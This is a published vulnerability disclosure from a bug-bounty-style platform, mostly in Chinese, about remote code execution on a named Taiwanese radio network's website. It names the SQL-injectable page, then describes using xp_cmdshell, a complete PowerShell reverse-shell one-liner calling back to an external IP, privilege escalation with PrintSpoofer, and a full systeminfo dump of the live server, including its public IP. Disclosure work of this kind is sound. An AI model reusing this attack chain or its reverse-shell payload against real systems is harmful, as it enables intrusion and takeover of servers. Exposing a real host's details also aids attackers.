Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2023-00268
- 發信 Vendor: 好事聯播網
- Title: 好事聯播網
- Introduction: RCE
處理狀態
目前狀態
公開
Last Update : 2023/08/11
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2023/06/11 16:50:28 : 新提交 (由 Noth 更新此狀態)
- 2023/06/11 16:53:12 : 新提交 (由 Noth 更新此狀態)
- 2023/06/11 16:58:10 : 新提交 (由 Noth 更新此狀態)
- 2023/06/11 17:01:52 : 新提交 (由 Noth 更新此狀態)
- 2023/06/11 17:02:56 : 新提交 (由 Noth 更新此狀態)
- 2023/06/11 17:13:54 : 新提交 (由 Noth 更新此狀態)
- 2023/06/11 17:17:04 : 新提交 (由 Noth 更新此狀態)
- 2023/06/11 17:20:21 : 新提交 (由 Noth 更新此狀態)
- 2023/06/12 10:38:46 : 新提交 (由 Noth 更新此狀態)
- 2023/06/15 11:28:20 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/06/20 21:41:25 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/06/20 21:41:25 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/06/20 21:41:25 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/08/11 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2023-00268
- 通報者:shen (Noth)
- 風險:嚴重
- 類型:遠端命令執行 (Remote Code Execution)
參考資料
攻擊者可經由該漏洞取得主機完整權限、任意寫入檔案及取得大量內網資訊。
漏洞說明: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection
漏洞說明: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection
漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html
漏洞說明: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
漏洞說明: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection
漏洞說明: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection
漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html
漏洞說明: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
http://www.bestradio.com.tw/
http://www.bestradio.com.tw/free.aspx?area=2
http://www.bestradio.com.tw/free.aspx?area=2
敘述
判斷頁面存在 SQL Injection 。
DBA 權限,執行 xp_cmdshell。
whoami :
nt service\mssqlserver利用境外 ip 成功 reverse shell。
powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('207.148.2.180', 443);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"systeminfo。
主機名稱: WIN-F9GPRVRGO0M
作業系統名稱: Microsoft Windows Server 2019 Standard
作業系統版本: 10.0.17763 N/A 組建 17763
作業系統製造商: Microsoft Corporation
作業系統設定: 獨立伺服器
作業系統組建類型: Multiprocessor Free
註冊的擁有者: Windows 使用者
註冊公司:
產品識別碼: 00429-80126-83010-AA112
原始安裝日期: 2020/3/20, 下午 12:15:08
系統開機時間: 2022/11/19, 下午 12:21:05
系統製造商: HP
系統型號: HP Z1 Entry Tower G5
系統類型: x64-based PC
處理器: 已安裝 1 處理器。
[01]: Intel64 Family 6 Model 158 Stepping 13 GenuineIntel ~3000 Mhz
BIOS 版本: HP R01 Ver. 02.01.00, 2019/5/10
Windows 目錄: C:\Windows
系統目錄: C:\Windows\system32
開機裝置: \Device\HarddiskVolume4
系統地區設定: zh-tw;中文 (台灣)
輸入法地區設定: N/A
時區: (UTC+08:00) 台北
實體記憶體總計: 16,158 MB
可用實體記憶體: 9,010 MB
虛擬記憶體: 大小上限: 18,590 MB
虛擬記憶體: 可用: 11,034 MB
虛擬記憶體: 使用中: 7,556 MB
分頁檔位置: C:\pagefile.sys
網域: WORKGROUP
登入伺服器: N/A
Hotfix: 已安裝 2 Hotfix。
[01]: KB4486153
[02]: KB4464455
網路卡: 已安裝 1 NIC。
[01]: Intel(R) Ethernet Connection (7) I219-LM
連線名稱: 乙太網路
DHCP 已啟用: 否
IP 位址
[01]: 210.61.64.161
[02]: fe80::50b7:ab03:5ae8:b4eb
Hyper-V 需求: VM 監視器模式擴充: 是
韌體中已啟用虛擬化: 是
第二層位址轉譯: 是
具有資料執行防止: 是查看當前權限。
whoami /priv利用 PrintSpoofer.exe 成功提權,取得 system 權限。
因為是國內站點,故不繼續進行內網橫向移動 , 請排除來自日本 (37.19.X.X) 以及 (207.148.2.180) IP。
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。